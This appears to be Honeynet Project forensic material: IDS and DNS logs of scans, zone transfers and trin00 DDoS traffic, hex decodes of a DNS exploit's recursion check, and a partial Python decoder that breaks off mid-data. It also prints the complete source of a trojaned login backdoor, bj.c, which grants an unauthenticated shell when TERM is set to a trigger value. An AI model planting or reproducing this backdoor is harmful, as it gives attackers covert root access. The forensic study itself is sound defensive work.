Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
Apr 20 22:46:57 mozart snort[12632]: IDS/RPC-rpcinfo-query: 207.239.115.11:3619 -> 172.16.1.107:111
Apr 20 22:48:13 mozart snort[12632]: IDS159/Ping Microsoft Windows: 216.228.4.204 -> 172.16.1.101
Apr 20 23:00:33 mozart snort[12657]: IDS171/Ping zeros: 216.228.4.133 -> 172.16.1.101
Apr 21 11:01:27 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4039 -> 172.16.1.101:53
Apr 21 11:01:28 mozart snort[12777]: IDS/DNS-version-query: 207.236.55.76:4044 -> 172.16.1.107:53
Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1368 -> 172.16.1.101:53
Apr 22 08:36:29 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:1328 -> 172.16.1.107:53
Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4401 -> 172.16.1.101:53
Apr 22 10:00:23 mozart snort[743]: IDS/DNS-version-query: 212.244.222.100:4369 -> 172.16.1.107:53
Apr 22 11:31:58 mozart snort[743]: IDS/RPC-rpcinfo-query: 213.1.152.141:728 -> 172.16.1.101:111
Apr 23 01:33:51 mozart snort[3919]: IDS128/web-cgi-phf: 12.68.183.51:4310 -> 172.16.1.107:80
Apr 23 01:33:56 mozart snort[3919]: IDS218/web-cgi-test-cgi: 12.68.183.51:4312 -> 172.16.1.107:80
Apr 23 01:34:01 mozart snort[3919]: IDS235/web-cgi-handler: 12.68.183.51:4314 -> 172.16.1.107:80
Apr 23 01:34:20 mozart snort[3919]: IDS219/web-cgi-perl-exe: 12.68.183.51:4321 -> 172.16.1.107:80
Apr 23 01:34:36 mozart snort[3919]: IDS224/web-cgi-nph-test-cgi: 12.68.183.51:4328 -> 172.16.1.107:80
Apr 23 21:01:18 mozart snort[3919]: spp_portscan: PORTSCAN DETECTED from 210.178.9.125
Apr 23 21:01:25 mozart snort[3919]: IDS/RPC-rpcinfo-query: 210.178.9.125:850 -> 172.16.1.101:111
Apr 24 07:09:47 mozart snort[4663]: IDS212/dns-zone-transfer: 210.145.109.162:12540 -> 172.16.1.107:53
Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.107:111
Apr 24 09:23:01 mozart snort[4663]: IDS7/SourcePortTraffic-53-tcp: 202.42.233.186:53 -> 172.16.1.101:111
Apr 24 09:23:05 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:637 -> 172.16.1.107:111
Apr 24 09:23:10 mozart snort[4663]: IDS/RPC-rpcinfo-query: 202.42.233.186:638 -> 172.16.1.101:111
Apr 24 14:36:55 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.105
Apr 24 14:43:35 mozart snort[4663]: IDS162/Ping Nmap 2.36BETA: 194.222.156.169 -> 172.16.1.101
Apr 24 14:46:46 mozart snort[4663]: spp_portscan: PORTSCAN DETECTED from 194.222.156.169
Apr 24 14:46:46 mozart snort[4663]: IDS27/FIN Scan: 194.222.156.169:56693 -> 172.16.1.107:482
Apr 24 17:59:51 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:2891 -> 172.16.1.101:53
Apr 24 18:01:05 mozart snort[4663]: IDS/DNS-version-query: 212.244.97.121:3485 -> 172.16.1.107:53
Apr 24 19:04:01 mozart snort[4663]: IDS213/ftp-passwd-retrieval: 194.222.156.169:1425 -> 172.16.1.107:21
Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4499 -> 172.16.1.107:53
Apr 25 02:08:07 mozart snort[5875]: IDS/DNS-version-query: 63.226.81.13:4630 -> 172.16.1.101:53
Apr 25 02:38:17 mozart snort[5875]: IDS/RPC-rpcinfo-query: 212.251.1.94:642 -> 172.16.1.107:111
Apr 25 08:02:41 mozart snort[5875]: spp_portscan: PORTSCAN DETECTED from 24.9.255.53
Apr 25 08:02:41 mozart snort[5875]: IDS/DNS-version-query: 24.9.255.53:2991 -> 172.16.1.101:53
Apr 25 19:37:32 mozart snort[5875]: IDS230/web-cgi-space-wildcard: 198.173.35.164:4221 -> 172.16.1.107:80
Apr 26 05:45:12 mozart snort[6283]: IDS212/dns-zone-transfer: 38.31.107.87:2291 -> 172.16.1.101:53
Apr 26 06:43:05 mozart snort[6283]: IDS181/nops-x86: 63.226.81.13:1351 -> 172.16.1.107:53
Apr 26 06:45:34 mozart snort[6283]: IDS175/socks-probe: 24.112.167.35:20 -> 172.16.1.107:1080
Apr 26 06:52:10 mozart snort[6283]: IDS127/telnet-login-incorrect: 172.16.1.107:23 -> 213.28.22.189:4558
Apr 26 10:39:12 mozart snort[621]: spp_portscan: PORTSCAN DETECTED from 204.72.244.72
Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.101:53
Apr 26 10:39:12 mozart snort[621]: IDS198/SYN FIN Scan: 204.72.244.72:53 -> 172.16.1.107:53
Apr 26 17:11:07 mozart snort[621]: IDS128/web-cgi-phf: 207.239.115.11:3536 -> 172.16.1.105:80
Apr 26 17:11:17 mozart snort[621]: IDS/DNS-version-query: 207.239.115.11:4727 -> 172.16.1.105:53
Apr 29 21:05:06 mozart snort[5358]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
Apr 29 21:05:06 mozart snort[5358]: IDS198/SYN FIN Scan: 212.109.2.136:1080 -> 172.16.1.105:1080
Apr 30 02:06:37 mozart snort[5750]: spp_portscan: PORTSCAN DETECTED from 202.185.32.60
Apr 30 02:06:37 mozart snort[5750]: IDS198/SYN FIN Scan: 202.185.32.60:0 -> 172.16.1.101:143
May 1 04:03:40 mozart snort[6038]: spp_portscan: PORTSCAN DETECTED from 63.203.1.60
May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3083
May 1 04:03:47 mozart snort[6038]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 63.203.1.60:3215
May 1 06:36:53 mozart snort[6038]: IDS212/dns-zone-transfer: 63.203.1.60:1089 -> 172.16.1.101:53
May 2 16:28:05 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1708 -> 172.16.1.101:53
May 2 16:28:40 mozart snort[6443]: IDS/DNS-version-query: 207.229.143.40:1715 -> 172.16.1.101:53
May 2 17:01:43 mozart snort[6443]: IDS/DNS-version-query: 24.114.97.247:3429 -> 172.16.1.101:53
May 3 19:17:53 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
May 3 19:17:53 mozart snort[6862]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
May 3 20:34:15 mozart snort[6862]: IDS/RPC-rpcinfo-query: 200.241.69.1:3697 -> 172.16.1.101:111
May 3 23:33:55 mozart snort[6862]: spp_portscan: PORTSCAN DETECTED from 210.97.123.3
May 3 23:33:55 mozart snort[6862]: IDS198/SYN FIN Scan: 210.97.123.3:0 -> 172.16.1.105:109
May 4 04:59:35 mozart snort[7541]: spp_portscan: PORTSCAN DETECTED from 205.242.148.1
May 4 04:59:35 mozart snort[7541]: IDS198/SYN FIN Scan: 205.242.148.1:0 -> 172.16.1.101:109
May 4 15:32:17 mozart snort[7541]: IDS/DNS-version-query: 63.224.195.25:2293 -> 172.16.1.101:53
May 4 19:14:34 mozart snort[7541]: IDS/DNS-version-query: 12.10.173.249:3434 -> 172.16.1.101:53
May 5 06:06:52 mozart snort[8324]: IDS212/dns-zone-transfer: 211.38.95.197:2262 -> 172.16.1.101:53
May 5 08:35:48 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:953 -> 172.16.1.101:111
May 5 08:35:49 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:955 -> 172.16.1.101:111
May 5 08:35:53 mozart snort[8324]: IDS20/portmap-request-sadmind: 139.130.213.4:901 -> 172.16.1.101:111
May 5 08:35:54 mozart snort[8324]: IDS247/large-udp: 139.130.213.4:902 -> 172.16.1.101:32773
May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:954 -> 172.16.1.101:111
May 5 08:36:53 mozart snort[8324]: IDS17/portmap-request-cmsd: 216.32.113.137:956 -> 172.16.1.101:111
May 5 16:04:21 mozart snort[8324]: IDS/RPC-rpcinfo-query: 195.117.3.58:970 -> 172.16.1.101:111
May 5 17:04:28 mozart snort[8324]: spp_portscan: PORTSCAN DETECTED from 212.109.2.136
May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.107:109
May 5 17:04:28 mozart snort[8324]: IDS198/SYN FIN Scan: 212.109.2.136:109 -> 172.16.1.101:109
May 5 17:42:24 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:2277 -> 172.16.1.101:53
May 5 17:46:28 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1831 -> 172.16.1.101:53
May 5 17:52:58 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1482 -> 172.16.1.101:53
May 5 17:58:16 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3310 -> 172.16.1.101:53
May 5 20:29:05 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:1723 -> 172.16.1.101:53
May 5 20:32:01 mozart snort[8324]: IDS/DNS-version-query: 203.155.66.1:3132 -> 172.16.1.101:53
May 6 08:54:09 victim1.honeynet.org named[4991]: unapproved AXFR from [212.72.63.240].4429 for UICMBA.edu (not master/slave)
May 6 19:44:52 victim1.honeynet.org named[4991]: unapproved AXFR from [211.39.95.226].4958 for UICMBA.edu (not master/slave)
May 7 19:22:22 victim1.honeynet.org named[4991]: unapproved AXFR from [216.190.204.3].1866 for UICMBA.edu (not master/slave)
May 8 12:42:05 victim1.honeynet.org named[4991]: unapproved AXFR from [203.75.204.245].4542 for UICMBA.edu (not master/slave)
May 8 21:53:03 lisa snort[387]: IDS118/Traceroute ICMP: 24.21.107.249 -> 172.16.1.104
May 8 21:58:40 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
May 8 21:58:41 lisa snort[387]: spp_portscan: PORTSCAN DETECTED from 24.21.107.249
May 8 21:59:06 lisa snort[387]: IDS162/Ping Nmap 2.36BETA: 24.21.107.249 -> 172.16.1.104
May 8 22:16:06 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34536 -> 172.16.1.104:33457
May 8 22:16:45 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.80:34546 -> 172.16.1.104:33446
May 8 22:17:35 lisa snort[387]: IDS115/Traceroute UDP: 206.117.161.81:34561 -> 172.16.1.104:33457
May 9 08:02:54 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 216.61.43.89
May 9 08:21:02 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 204.2.13.22
May 9 09:39:28 lisa snort[2370]: IDS212/dns-zone-transfer: 206.133.123.19:2421 -> 172.16.1.101:53
May 9 11:03:20 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2984 -> 172.16.1.107:27444
May 9 11:03:20 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1025 -> 137.132.17.202:31335
May 9 11:26:04 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:2988 -> 172.16.1.107:27444
May 9 11:26:04 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1027 -> 137.132.17.202:31335
May 9 14:04:55 lisa snort[2370]: spp_portscan: PORTSCAN DETECTED from 206.133.123.19
May 9 14:04:57 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1720
May 9 14:04:58 lisa snort[2370]: IDS8/telnet-daemon-active: 172.16.1.101:23 -> 206.133.123.19:1741
May 9 14:05:08 lisa snort[2370]: IDS128/web-cgi-phf: 206.133.123.19:1815 -> 172.16.1.107:80
May 9 14:05:09 lisa snort[2370]: IDS218/web-cgi-test-cgi: 206.133.123.19:1820 -> 172.16.1.107:80
May 9 14:05:09 lisa snort[2370]: IDS235/web-cgi-handler: 206.133.123.19:1824 -> 172.16.1.107:80
May 9 20:48:14 lisa snort[2370]: IDS197/trin00-master-to-daemon: 137.132.17.202:3076 -> 172.16.1.107:27444
May 9 20:48:14 lisa snort[2370]: IDS187/trin00-daemon-to-master-pong: 172.16.1.107:1028 -> 137.132.17.202:31335

EoF

the backdoor code bj.c Know your enemy #3: Forensics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#define _XOPEN_SOURCE
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

/* Trojaned "login": the real login binary has been moved to LOGIN and this
 * wrapper installed in its place.  A session whose TERM variable carries the
 * trigger value ENV_VALUE gets SHELL with login's own privileges and no
 * authentication; every other session is passed to the real login and sees
 * nothing unusual.  argv[0] is forced to "login" on both paths so process
 * listings look normal. */
#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/usr/bin/xstat"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "vt9111"
#define ENV_FIX "r!!t!d"

int owned(void);
char **av, **ep;

int main(int argc, char **argv, char **envp)
{
  av=argv;
  ep=envp;
  av[0]=SHELL_CALLME;
  if (owned()) {
    /* trigger present: exec the shell directly, skipping authentication */
    char *sav[]={ SHELL_CALLME, NULL };
    execve(SHELL, sav, ep);
    return 0;
  }
  /* no trigger: hand the original arguments to the relocated real login */
  execve(LOGIN, av, ep);
  return 0;
}

/* Walk the environment looking for TERM=vt9111.  On a match the entry is
 * replaced with TERM=r!!t!d so the trigger value never reaches the shell.
 * Note that strtok() writes a NUL over each '=' it splits on, so every entry
 * inspected before a match (all of them when there is none) is truncated to
 * its bare name in the environment handed to the real login. */
int owned(void)
{
  char *name, *value;
  int i;
  for (i=0; ep[i]!=NULL; ++i) {
    name=strtok(ep[i], "=");
    value=strtok(NULL, "=");
    if (name==NULL || value==NULL) continue;
    if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
      if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
        char tmp[100];
        sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);
        ep[i]=strdup(tmp);
        return 1;
      }
    }
  }
  return 0;
}

EoF

detailed forensic analysis of an attack Know your enemy #3 : Forensics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- COMMENT: The Tickle ---

What you are looking at below are the decoded packets of the exploit. For this particular DNS exploit to work, the DNS victim must be recursive (as I soon learned). So, our black-hat has to determine that our victim DNS server is recursive. He first tests this by querying the DNS server to resolve 107.71.80.216.in-addr.arpa. If successful, he will then know our DNS server is recursive. Below you see the packets of the successful, recursive lookup of 107.71.80.216.in-addr.arpa.
04/26-06:42:59.473423 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:18856 Len: 52 95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .j...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 04/26-06:42:59.474405 172.16.1.107:1028 -> 128.8.10.90:53 UDP TTL:64 TOS:0x0 ID:18861 Len: 52 5C 21 01 00 00 01 00 00 00 00 00 00 03 31 30 37 \!...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 04/26-06:42:59.574808 128.8.10.90:53 -> 172.16.1.107:1028 UDP TTL:48 TOS:0x0 ID:5077 Len: 135 5C 21 81 00 00 01 00 00 00 02 00 00 03 31 30 37 \!...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 02 37 31 02 dr.arpa......71. 38 30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 61 80.216.IN-ADDR.a 72 70 61 00 00 02 00 01 00 07 E9 00 00 12 03 4E rpa............N 53 30 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 S0.ENTERACT.COM. C0 2C 00 02 00 01 00 07 E9 00 00 13 07 42 49 46 .,...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D C0 5B ROST.SEASTROM.[ 04/26-06:42:59.576169 172.16.1.107:1028 -> 198.32.64.12:53 UDP TTL:64 TOS:0x0 ID:18862 Len: 46 87 2A 00 00 00 01 00 00 00 00 00 00 07 42 49 46 .*...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 M..... 04/26-06:42:59.576953 172.16.1.107:1028 -> 198.32.64.12:53 UDP TTL:64 TOS:0x0 ID:18863 Len: 42 DA 57 00 00 00 01 00 00 00 00 00 00 03 4E 53 30 .W...........NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 .. 04/26-06:43:00.215765 198.32.64.12:53 -> 172.16.1.107:1028 UDP TTL:51 TOS:0x0 ID:42900 Len: 462 87 2A 80 00 00 01 00 00 00 0C 00 0C 07 42 49 46 .*...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 03 43 4F 4D 00 00 02 00 01 00 M......COM...... 
07 E9 00 00 14 01 41 0C 52 4F 4F 54 2D 53 45 52 ......A.ROOT-SER 56 45 52 53 03 4E 45 54 00 C0 26 00 02 00 01 00 VERS.NET..&..... 07 E9 00 00 04 01 47 C0 37 C0 26 00 02 00 01 00 ......G.7.&..... 07 E9 00 00 11 01 46 0C 47 54 4C 44 2D 53 45 52 ......F.GTLD-SER 56 45 52 53 C0 44 C0 26 00 02 00 01 00 07 E9 00 VERS.D.&........ 00 04 01 46 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...F.7.&........ 00 04 01 49 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...I.7.&........ 00 04 01 45 C0 37 C0 26 00 02 00 01 00 07 E9 00 ...E.7.&........ 00 04 01 4A C0 67 C0 26 00 02 00 01 00 07 E9 00 ...J.g.&........ 00 04 01 4B C0 67 C0 26 00 02 00 01 00 07 E9 00 ...K.g.&........ 00 04 01 41 C0 67 C0 26 00 02 00 01 00 07 E9 00 ...A.g.&........ 00 04 01 4D C0 67 C0 26 00 02 00 01 00 07 E9 00 ...M.g.&........ 00 04 01 48 C0 67 C0 26 00 02 00 01 00 07 E9 00 ...H.g.&........ 00 04 01 43 C0 67 C0 35 00 01 00 01 00 36 EE 80 ...C.g.5.....6.. 00 04 C6 29 00 04 C0 55 00 01 00 01 00 36 EE 80 ...)...U.....6.. 00 04 C0 70 24 04 C0 65 00 01 00 01 00 07 E9 00 ...p$..e........ 00 04 C6 11 D0 43 C0 82 00 01 00 01 00 36 EE 80 .....C.......6.. 00 04 C0 05 05 F1 C0 92 00 01 00 01 00 36 EE 80 .............6.. 00 04 C0 24 94 11 C0 A2 00 01 00 01 00 36 EE 80 ...$.........6.. 00 04 C0 CB E6 0A C0 B2 00 01 00 01 00 07 E9 00 ................ 00 04 C6 29 00 15 C0 C2 00 01 00 01 00 07 E9 00 ...)............ 00 04 C3 08 63 0B C0 D2 00 01 00 01 00 07 E9 00 ....c........... 00 04 C6 29 03 26 C0 E2 00 01 00 01 00 07 E9 00 ...).&.......... 00 04 D2 B0 98 12 C0 F2 00 01 00 01 00 07 E9 00 ................ 00 04 D8 21 4B 52 C1 02 00 01 00 01 00 07 E9 00 ...!KR.......... 00 04 CD BC B9 12 ...... 04/26-06:43:00.218808 172.16.1.107:1028 -> 205.188.185.18:53 UDP TTL:64 TOS:0x0 ID:18864 Len: 46 E6 38 00 00 00 01 00 00 00 00 00 00 07 42 49 46 .8...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 M..... 
04/26-06:43:00.220217 198.32.64.12:53 -> 172.16.1.107:1028 UDP TTL:51 TOS:0x0 ID:42903 Len: 458 DA 57 80 00 00 01 00 00 00 0C 00 0C 03 4E 53 30 .W...........NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 03 43 4F 4D 00 00 02 00 01 00 07 E9 00 00 ...COM.......... 14 01 41 0C 52 4F 4F 54 2D 53 45 52 56 45 52 53 ..A.ROOT-SERVERS 03 4E 45 54 00 C0 22 00 02 00 01 00 07 E9 00 00 .NET.."......... 04 01 47 C0 33 C0 22 00 02 00 01 00 07 E9 00 00 ..G.3."......... 11 01 46 0C 47 54 4C 44 2D 53 45 52 56 45 52 53 ..F.GTLD-SERVERS C0 40 C0 22 00 02 00 01 00 07 E9 00 00 04 01 46 .@."...........F C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 49 .3."...........I C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 45 .3."...........E C0 33 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4A .3."...........J C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4B .c."...........K C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 41 .c."...........A C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 4D .c."...........M C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 48 .c."...........H C0 63 C0 22 00 02 00 01 00 07 E9 00 00 04 01 43 .c."...........C C0 63 C0 31 00 01 00 01 00 36 EE 80 00 04 C6 29 .c.1.....6.....) 00 04 C0 51 00 01 00 01 00 36 EE 80 00 04 C0 70 ...Q.....6.....p 24 04 C0 61 00 01 00 01 00 07 E9 00 00 04 C6 11 $..a............ D0 43 C0 7E 00 01 00 01 00 36 EE 80 00 04 C0 05 .C.~.....6...... 05 F1 C0 8E 00 01 00 01 00 36 EE 80 00 04 C0 24 .........6.....$ 94 11 C0 9E 00 01 00 01 00 36 EE 80 00 04 C0 CB .........6...... E6 0A C0 AE 00 01 00 01 00 07 E9 00 00 04 C6 29 ...............) 00 15 C0 BE 00 01 00 01 00 07 E9 00 00 04 C3 08 ................ 63 0B C0 CE 00 01 00 01 00 07 E9 00 00 04 C6 29 c..............) 03 26 C0 DE 00 01 00 01 00 07 E9 00 00 04 D2 B0 .&.............. 98 12 C0 EE 00 01 00 01 00 07 E9 00 00 04 D8 21 ...............! 4B 52 C0 FE 00 01 00 01 00 07 E9 00 00 04 CD BC KR.............. B9 12 .. 
04/26-06:43:00.222098 172.16.1.107:1028 -> 205.188.185.18:53 UDP TTL:64 TOS:0x0 ID:18865 Len: 42 3D 9D 00 00 00 01 00 00 00 00 00 00 03 4E 53 30 =............NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 .. 04/26-06:43:00.315827 205.188.185.18:53 -> 172.16.1.107:1028 UDP TTL:240 TOS:0x0 ID:40907 DF Len: 147 E6 38 80 00 00 01 00 01 00 02 00 02 07 42 49 46 .8...........BIF 52 4F 53 54 08 53 45 41 53 54 52 4F 4D 03 43 4F ROST.SEASTROM.CO 4D 00 00 01 00 01 C0 0C 00 01 00 01 00 02 A3 00 M............... 00 04 C0 94 FC 0A 08 53 45 41 53 54 52 4F 4D 03 .......SEASTROM. 63 6F 6D 00 00 02 00 01 00 02 A3 00 00 02 C0 0C com............. C0 36 00 02 00 01 00 02 A3 00 00 0F 03 4E 53 30 .6...........NS0 08 45 4E 54 45 52 41 43 54 C0 3F C0 0C 00 01 00 .ENTERACT.?..... 01 00 02 A3 00 00 04 C0 94 FC 0A C0 5C 00 01 00 ............\... 01 00 02 A3 00 00 04 CF E5 8F 03 ........... 04/26-06:43:00.317904 205.188.185.18:53 -> 172.16.1.107:1028 UDP TTL:240 TOS:0x0 ID:40908 DF Len: 147 3D 9D 80 00 00 01 00 01 00 02 00 02 03 4E 53 30 =............NS0 08 45 4E 54 45 52 41 43 54 03 43 4F 4D 00 00 01 .ENTERACT.COM... 00 01 C0 0C 00 01 00 01 00 02 A3 00 00 04 CF E5 ................ 8F 03 08 45 4E 54 45 52 41 43 54 03 63 6F 6D 00 ...ENTERACT.com. 00 02 00 01 00 02 A3 00 00 13 07 42 49 46 52 4F ...........BIFRO 53 54 08 53 45 41 53 54 52 4F 4D C0 3B C0 32 00 ST.SEASTROM.;.2. 02 00 01 00 02 A3 00 00 02 C0 0C C0 4A 00 01 00 ............J... 01 00 02 A3 00 00 04 C0 94 FC 0A C0 0C 00 01 00 ................ 01 00 02 A3 00 00 04 CF E5 8F 03 ........... 04/26-06:43:04.462930 213.28.22.189:1045 -> 172.16.1.107:53 UDP TTL:40 TOS:0x0 ID:18880 Len: 52 95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .j...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 
04/26-06:43:04.463599 172.16.1.107:1028 -> 192.148.252.10:53 UDP TTL:64 TOS:0x0 ID:18866 Len: 52 F1 8E 01 00 00 01 00 00 00 00 00 00 03 31 30 37 .............107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 dr.arpa..... 04/26-06:43:04.559157 192.148.252.10:53 -> 172.16.1.107:1028 UDP TTL:54 TOS:0x0 ID:7629 Len: 196 F1 8E 85 80 00 01 00 01 00 02 00 02 03 31 30 37 .............107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C dr.arpa......... 00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69 ....Q....11.lspi 74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74 tz.soho.enteract 03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07 .com..71.80.216. 49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00 IN-ADDR.ARPA.... 01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00 ...Q....ns0.G.U. 02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73 .....Q....bifros 74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01 t.seastrom.P.w.. 00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01 ................ 00 01 00 00 0E 10 00 04 C0 94 FC 0A ............ 04/26-06:43:04.560130 172.16.1.107:53 -> 213.28.22.189:1045 UDP TTL:64 TOS:0x0 ID:18867 Len: 196 95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37 .j...........107 02 37 31 02 38 30 03 32 31 36 07 69 6E 2D 61 64 .71.80.216.in-ad 64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C dr.arpa......... 00 01 00 01 51 80 00 1D 02 31 31 06 6C 73 70 69 ....Q....11.lspi 74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 63 74 tz.soho.enteract 03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07 .com..71.80.216. 49 4E 2D 41 44 44 52 04 41 52 50 41 00 00 02 00 IN-ADDR.ARPA.... 01 00 01 51 80 00 06 03 6E 73 30 C0 47 C0 55 00 ...Q....ns0.G.U. 02 00 01 00 01 51 80 00 13 07 62 69 66 72 6F 73 .....Q....bifros 74 08 73 65 61 73 74 72 6F 6D C0 50 C0 77 00 01 t.seastrom.P.w.. 00 01 00 00 0E 10 00 04 CF E5 8F 03 C0 89 00 01 ................ 00 01 00 00 0E 10 00 04 C0 94 FC 0A ............ 
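To make the recursion check concrete, here is a small DNS message decoder. It is an added example, not part of the Honeynet Project write-up or its tools. The three byte strings are constructed from the hex in this trace (IP/UDP/TCP headers stripped, DNS payload only): the tickle query, the reply 172.16.1.107 sent back, and the first 112 bytes of the "answer" that 63.226.81.13 later pushes over TCP in the Buffer Overflow section below. The RA flag in the reply is what tells the remote party that the server recurses; the TCP reply carries an additional record whose declared RDLENGTH (0x196B = 6507 bytes) is far larger than anything that follows it, which is exactly the sanity check a parser, or an IDS preprocessor, should apply before copying record data anywhere.

```python
import struct

# Constructed from the hex dumps on this page (DNS payload only).
# The "tickle": PTR query for 107.71.80.216.in-addr.arpa from 213.28.22.189.
TICKLE_QUERY = bytes.fromhex(
    "95 6A 01 00 00 01 00 00 00 00 00 00 03 31 30 37 02 37 31 02 38 30 03 32 31 36 "
    "07 69 6E 2D 61 64 64 72 04 61 72 70 61 00 00 0C 00 01"
)
# The reply 172.16.1.107 returned after resolving it recursively (188 bytes).
TICKLE_REPLY = bytes.fromhex(
    "95 6A 85 80 00 01 00 01 00 02 00 02 03 31 30 37 02 37 31 02 38 30 03 32 31 36 "
    "07 69 6E 2D 61 64 64 72 04 61 72 70 61 00 00 0C 00 01 C0 0C 00 0C 00 01 00 01 "
    "51 80 00 1D 02 31 31 06 6C 73 70 69 74 7A 04 73 6F 68 6F 08 65 6E 74 65 72 61 "
    "63 74 03 63 6F 6D 00 02 37 31 02 38 30 03 32 31 36 07 49 4E 2D 41 44 44 52 04 "
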